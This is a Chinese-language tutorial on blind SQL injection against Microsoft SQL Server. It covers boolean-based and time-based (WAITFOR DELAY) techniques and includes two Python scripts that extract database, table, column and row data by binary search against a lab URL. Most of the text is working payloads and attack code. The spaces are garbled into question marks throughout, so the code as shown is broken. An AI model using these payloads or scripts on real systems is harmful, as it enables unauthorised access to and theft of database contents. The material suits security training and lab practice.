SQL Server从0到1——盲注

布尔盲注（有回显）

1.爆破数据库名:

ascii(substring(db_name(),1,1))=95
#使用substring将字符串分解，对比ascii码

2.爆破表名：

1=(select?count(*)?from?sysobjects?where?name?in?(select?top?1?name?from?sysobjects?where?xtype='u')?and?ascii(substring(name,1,1))<95)
#通过条件筛选，并使用count来回去返回的行数，如果为1就说明存在，及正确

3.爆破字段名：

ascii(substring((SELECT?TOP?1?column_name?FROM?information_schema.columns?where??table_name='users'),1,1))<95
#通过对比ascii码

4.爆破数据：

ascii(substring((select?top?1?username?from?users),1,1))<95

附带一个简单的脚本

import?requests
from?time?import?time

url='http://192.168.0.105/less-1.asp'

result=''
for?num?in?range(1,100):
????#取32-128的ascii码
????pointer?=?1
????min=32
????max=128
????#num为当前的爆破的字符位置
????#pointer为正在使用的ascii
????while?1:
????????pointer=min+(max-min)//2
????????if?min==pointer:
????????????if?pointer?==?127?or?pointer?==?0:
????????????????exit()
????????????result?+=?chr(pointer)
????????????print(result)
????????????break

????????#?爆表名
????????#payload?=?f"?id=1'?and?ascii(substring((select?top?1?name?from?master.dbo.sysdatabases),{num},1))?<?{pointer}--+".format(
????????#num,?pointer)
????????#?爆表名
????????#?payload?=?f"?id=1'?and?1=(select?count(*)?from?sysobjects?where?name?in?(select?top?1?name?from?sysobjects?where?xtype='u')?and?ascii(substring(name,{num},1))<{pointer})--+".format(
????????#?????num,?pointer)
????????#?爆表名
????????payload?=?f"?id=1'?and?ascii(substring((SELECT?TOP?1?column_name?FROM?information_schema.columns?where??table_name='users'),{num},1))<{pointer}--+".format(
????????????num,?pointer)
????????result_html=requests.get(url=url+payload).text
????????#?print(result_html)
????????if?r"Your?Login?name"?in?result_html:
????????????max=pointer
????????else?:
????????????min=pointer

时间盲注（无回显）

使用WAITFOR DELAY进行延迟

;if?(ascii(substring(db_name(),2,1)))=101?WAITFOR?DELAY?'0:0:5'
#这里利用并不能像mysql一样在where语句后添加if语句，而是只能利用堆叠注入添加一个if语句来执行延迟
操作和布尔盲注基本一样，在这里直接上脚本：

import?requests


import?time


url='http://192.168.0.105/less-1.asp'


result=''
for?num?in?range(1,100):
????#取32-128的ascii码
????pointer?=?1
????min=32
????max=128
????#num为当前的爆破的字符位置
????#pointer为正在使用的ascii
????while?1:
????????pointer=min+(max-min)//2
????????if?min==pointer:
????????????if?pointer?==?127?or?pointer?==?0:
????????????????exit()
????????????result?+=?chr(pointer)
????????????print(result)
????????????break


????????#?爆表名
????????payload?=?f"?id=1';if(ascii(substring((select?top?1?name?from?master.dbo.sysdatabases),{num},1)))?<?{pointer}?WAITFOR?DELAY?'0:0:1'--+".format(
????????num,?pointer)
????????#?爆表名
????????#?payload?=?f"?id=1'?if(1)=(select?count(*)?from?sysobjects?where?name?in?(select?top?1?name?from?sysobjects?where?xtype='u')?and?ascii(substring(name,{num},1))<{pointer})?WAITFOR?DELAY?'0:0:1'--+".format(
????????#?????num,?pointer)
????????#?爆表名
????????#?payload?=?f"?id=1';if(ascii(substring((SELECT?TOP?1?column_name?FROM?information_schema.columns?where??table_name='users'),{num},1)))<{pointer}?WAITFOR?DELAY?'0:0:1'--+".format(
????????#?????num,?pointer)
????????result_html=requests.get(url=url+payload).text
????????#?print(url+payload)
????????#?print(result_html)
????????try:
????????????r?=?requests.get(url=url+payload,timeout=0.5)
????????????min?=?pointer
????????except:
????????????max?=?pointer
????????time.sleep(0.2)
????time.sleep(1)

值得注意的是，盲注其实也可以使用like加通配符进行注入，但是如果使用ascii，可以使用二分法减少运算量，因此like的方法我们就不在重复，浪费大家的时间了，推荐使用二分法